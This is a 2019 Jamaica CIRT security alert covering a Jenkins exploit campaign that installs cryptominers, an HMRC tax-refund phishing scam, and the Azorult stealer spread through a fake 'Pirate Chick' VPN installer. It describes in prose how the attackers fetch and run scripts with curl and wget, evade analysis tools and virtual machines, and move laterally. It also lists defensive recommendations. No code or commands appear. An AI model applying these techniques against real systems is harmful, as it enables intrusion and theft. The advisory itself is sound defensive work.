Apache Jenkins | Tax Refund | Azorult

Alert ID: 
JMCIRT-AL-2019.023
Alert Date: 
Tuesday, May 21, 2019
Threat Level: 
High

 

Apache Jenkins

Original release date: May 13, 2019​​

Jamaica CIRT has become aware of an attack targeting vulnerable Apache Jenkins installations to deliver cryptocurrency mining software.

Overview

The attackers in this ongoing campaign identified public facing servers running a version of Apache Jenkins vulnerable to CVE-2018-1000861 and exploited the vulnerability by sending a specially crafted HTTP GET request. In this particular case, curl and wget were used to download content from PasteBin which was then piped to bash for execution. This content was identified to be a shell script that killed running cryptomining processes and proceeded to download and execute another malicious file. Additionally, it attempts to move laterally on the network using local ssh keys. The file downloaded by the shell script was identified to be a dropper for the cryptomining software. The dropper also performed rootkit-like behaviour by hooking into various functions to render the dropped files unreadable by users and hide the network connections associated with the malicious activity

Recommendations

Ensure anti-virus software and associated files are up to date.
Search for existing signs of the indicated IOCs in your environment.
Block all URL and IP based IoCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.
Keep applications and operating systems running at the current released patch level.

 

Tax Refund Phishing Scam

Original release date: May 13, 2019​​

Jamaica CIRT has become aware of a new phishing email campaign.

Overview

The email pretends to come from the HMRC (Her Majesty's Revenue Commission), and claims to be a Council Tax refund. Once a victim opens the PDF attachment, they are directed to click a link in order to receive their refund. Upon clicking, they are redirected to a site maintained by the threat actors and are prompted for the following information: name, address, phone number, date of birth, email address, mother’s maiden name, and financial details. The last page a victim views in this scam is a prompt letting them know that they will be refunded by a certain date, which of course, is the furthest thing from the truth.

Recommendations

Raise awareness on password/credentials hygiene and detecting phishing attempts.
Ensure anti-virus software and associated files are up to date.
Search for existing signs of the indicated IOCs in your environment.
Block all URL and IP based IoCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.

 

Azorult Info Stealing Trojan

Original release date: May 14, 2019​​

Jamaica CIRT has become aware of adware bundles distributing a VPN application named “Pirate Chick” that ultimately downloads and installs malicious payloads

Overview

The VPN program was found as an "offer" in several adware bundles, such as fake Adobe Flash installers. Upon execution, the fake VPN installer first checks for the presence of analysis tool processes, such as Wireshark, Regshot and ProcessHacker, and if found will skip the malware installation. The next check is a geolocation lookup that will skip the malware install if the originating IP is in Russia, Belarus, Ukraine, or Kazakhstan. The final check is to determine whether the host is running VMware, VirtualBox, or HyperV. If the checks all pass, a text file is downloaded from the Pirate Chick VPN website. The file contains base64-encoded content that is subsequently decoded and saved as an executable. Currently, the executable being distributed is the legitimate Sysinternals Process Monitor tool, but during the initial analysis the AZORult information stealer was being downloaded instead. After installing the malicious payload, the VPN software is installed and the user receives a link to a sign up page, which is currently broken. The researchers note that although the VPN installer is currently installing the legitimate Procmon.exe executable, the attacker could host any malicious file on their website.

Recommendations

Ensure anti-virus software and associated files are up to date.
Search for existing signs of the indicated IOCs in your environment.
Block all URL and IP based IoCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.
Keep applications and operating systems running at the current released patch level.